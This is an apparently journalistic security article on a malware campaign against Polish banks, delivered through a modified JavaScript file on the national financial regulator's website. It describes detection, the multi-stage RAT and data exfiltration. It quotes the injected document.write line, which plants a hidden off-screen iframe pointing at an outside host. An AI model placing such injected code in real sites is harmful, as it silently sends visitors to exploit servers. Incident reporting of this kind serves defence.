Polish banks are frantically scanning their workstations and servers while checking logs in the search of signs of infection after some of them noticed unusual network activity and unauthorised files on key machines within their networks. This is – by far – the most serious information security incident we have seen in Poland.
It has been a busy week in SOCs all over polish financial sector. At least a few of polish 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognised on some servers were the first signs of trouble. A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise managed to share that information with other banks, who started asking their SIEMs for information. In some cases the results came back positive.
Preliminary investigation suggests that the starting point for the infection could have been located on the webserver of polish financial sector regulatory body, Polish Financial Supervision Authority (www.knf.gov.pl). Due to a slight modification of one of the local JS files, an external JS file was loaded, which could have executed malicious payloads on selected targets. This would be really ironic if the website of the key institution responsible for assuring proper security level in the banking sector was used to attack it.
Data from PassiveTotal does confirm the finding related to external resources included in knf.gov.pl website since 2016-10-07 till yesterday.
To unauthorised code was located in the following file:
and looked like that:
document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor .ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top :0px;'></iframe></div>");
After successful exploitation malware was downloaded to the workstation, where, once executed, connected to some foreign servers and could be used to perform network reconnaissance, lateral movement and data exfiltration. At least in some cases the attackers managed to gain control over key servers within bank infrastructure.
While you can find some hashes at the end of this article, we gathered the available information regarding the malware itself. While there might be some elements borrowed from other similar tools and crimeware strategies, the malware used in this attack has not been documented before. It uses some commercial packers and multiple obfuscation methods, has multiple stages, relies on encryption and at the moment of initial analysis was not recognised by available AV solutions. The final payload has the functionality of a regular RAT.
While we have no idea of attackers motivation, so far we have no knowledge of any direct financial losses incurred by banks or their customers due to this attack. What is more troubling, some of the victims were able to identify large outgoing data transfers. So far they could not identify the contents of the data as it was encrypted. Investigation continues to fully understand the scope of losses.
Conclusions & IOCs
While this should not come as a surprise, this incident is the perfect example of the statement “you are going to get infected”. Polish financial sector has some of the best people and tools in terms of security and still it looks like the attackers achieved their objectives without major hurdles in at least some cases. On the good side – they were detected and once notified banks were able to quickly identify infected machines and suspicious traffic patterns. The whole process lacked solid information sharing, but this is a problem know everywhere.